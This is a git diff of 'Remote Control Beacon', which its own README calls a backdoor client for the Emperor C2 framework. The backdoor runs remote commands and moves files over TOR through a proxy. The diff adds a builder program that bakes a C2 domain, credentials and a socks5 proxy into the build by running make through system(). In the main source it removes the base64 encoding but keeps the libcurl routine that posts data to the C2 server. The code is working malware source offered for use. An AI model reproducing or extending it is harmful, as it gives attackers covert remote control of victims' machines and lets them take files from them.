.gitignore

@@ -1 +0,0 @@
-bin

.vimspector.json

@@ -1,19 +0,0 @@
-{
-	"configurations": {
-		"Debug RCB": {
-			"adapter": "vscode-cpptools",
-			"configuration": {
-				"type": "cppdbg",
-				"request": "launch",
-				"program": "${workspaceRoot}/RCB",
-				"args": [
-				],
-				"cwd": "${workspaceRoot}",
-				"environment": [
-				],
-				"MIMode": "gdb"
-			}
-		}
-	}
-}
-

MakeRCB.cpp

@@ -0,0 +1,27 @@
+#include <iostream>
+#include <string>
+
+int main()
+{
+	std::string sUsername;
+	std::string sPassword;
+	std::string sC2Domain;
+	std::string sProxy;
+
+	std::cout << "Enter the username to be used by RCB: ";
+	std::cin >> sUsername;
+
+	std::cout << "Enter the password to be used by RCB: ";
+	std::cin >> sPassword;
+
+	std::cout << "Enter the C2 domain to be used by RCB: ";
+	std::cin >> sC2Domain;
+
+	std::cout << "Enter the socks5 proxy address to be used by RCB: ";
+	std::cin >> sProxy;
+
+	std::string sCommand = "sUsername=" + sUsername + " sPassword=" + sPassword + " sC2Domain=" + "http:/" + sC2Domain + " sProxy=" + "socks5h:/" + sProxy + " make"; // todo: figure out why this works and why // doesn't
+	const char *cCommand = sCommand.c_str(); // convert string to c string for running as command
+
+	system(cCommand); // run the make command with environment variables
+}

RCB.cpp

@@ -1,7 +1,6 @@
 #include <curl/curl.h>
 #include <unistd.h>
 
-#include <array>
 #include <fstream>
 #include <iostream>
 #include <regex>
@@ -25,61 +24,15 @@ size_t writeCallback(void *contents, size_t size, size_t nmemb, std::string *s)
 	return newLength;
 }
 
-std::string encodeTriplet(std::uint8_t iByte1, std::uint8_t iByte2, std::uint8_t iByte3)
-{
-	std::array<char, 64> encodeTable{'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V',
-					 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r',
-					 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/'};
-	std::string sEncodedTriplet = "";
-	std::uint32_t combinedTriplet = (iByte1 << 16) | (iByte2 << 8) | iByte3;
-	sEncodedTriplet += encodeTable[combinedTriplet >> 18];
-	sEncodedTriplet += encodeTable[combinedTriplet >> 12 & 0x3F];
-	sEncodedTriplet += encodeTable[combinedTriplet >> 6 & 0x3F];
-	sEncodedTriplet += encodeTable[combinedTriplet & 0x3F];
-	return sEncodedTriplet;
-}
-
-std::string b64Encode(std::string sWriteData)
-{
-	std::string sEncodedData = "";
-	std::string sEncodedBuffer;
-
-	while (sWriteData.length() > 0)
-	{
-		if (sWriteData.length() >= 3)
-		{
-			sEncodedData += encodeTriplet(sWriteData[0], sWriteData[1], sWriteData[2]);
-			sWriteData.erase(0, 3);
-		}
-		else if (sWriteData.length() == 2)
-		{
-			sEncodedBuffer = encodeTriplet(sWriteData[0], sWriteData[1], '0');
-			sEncodedBuffer.replace(3, 1, "$");
-			sEncodedData += sEncodedBuffer;
-			sWriteData.erase();
-		}
-		else if (sWriteData.length() == 1)
-		{
-			sEncodedBuffer = encodeTriplet(sWriteData[0], '0', '0');
-			sEncodedBuffer.replace(2, 2, "$$");
-			sEncodedData += sEncodedBuffer;
-			sWriteData.erase();
-		}
-	}
-	return sEncodedData;
-}
-
 std::string sendData(std::string sParam1, std::string sValue1, std::string sParam2 = "", std::string sValue2 = "")
 {
 	CURL *curl;
 	CURLcode res;
 	std::string sReadData;
-	sValue1 = b64Encode(sValue1);
 	std::string sWriteData = sParam1 + "=" + sValue1;
 
 	if (sParam2 != "")
 	{
-		sValue2 = b64Encode(sValue2);
 		sWriteData = sWriteData + "&" + sParam2 + "=" + sValue2;
 	}
 
@@ -94,9 +47,9 @@ std::string sendData(std::string sParam1, std::string sValue1, std::string sPara
 		curl_easy_setopt(curl, CURLOPT_USERNAME, STR(sUsername));	     // set username for http auth
 		curl_easy_setopt(curl, CURLOPT_PASSWORD, STR(sPassword));	     // set password for http auth
 		curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writeCallback);	     // write function for storing response
-		// char *cWriteData = curl_easy_escape(curl, sWriteData.c_str(), sWriteData.length());
+		//char *cWriteData = curl_easy_escape(curl, sWriteData.c_str(), sWriteData.length());
 		curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE_LARGE, sWriteData.length());  // set the post request field size
-		curl_easy_setopt(curl, CURLOPT_POSTFIELDS, sWriteData.c_str());		   //);	     // choose the data to send in the post request
+		curl_easy_setopt(curl, CURLOPT_POSTFIELDS, sWriteData.c_str());//);	     // choose the data to send in the post request
 		curl_easy_setopt(curl, CURLOPT_WRITEDATA, &sReadData);		     // write the data to the writeCallback function
 		curl_easy_perform(curl);					     // run query
 	}
@@ -184,6 +137,13 @@ int main()
 				std::string sSplit;
 				for (int i = 0; i < sResponse.length(); i++)
 				{
+					/*if (sResponse[i] == '\n' && bFilename == true)
+					{
+						sData.push_back(sSplit);  // add the sSplit string to the vector of strings sCommands
+						sSplit = "";		  // set sSplit to empty
+						bFilename = false;
+					}*/
+
 					if (sResponse[i] == '=' || sResponse[i] == '&')  // if we have reached the end of the parameter
 					{
 						sData.push_back(sSplit);  // add the sSplit string to the vector of strings sCommands

README.md

@@ -1,9 +0,0 @@
-# Remote Control Beacon
-A client side Emperor C2 framework backdoor.
-
-This backdoor can communicate with Emperor itself, and can perform the following functions:
-* Connect to the server (via TOR through a configured FOB)
-* Request and execute commands
-* Upload and download files to and from the server
-
-Most of the communications between the client and server are base64 encoded, but not encrypted. This means that the traffic, before reaching the FOB, is unencrypted. I was considering maybe adding RC4 encryption in the future :)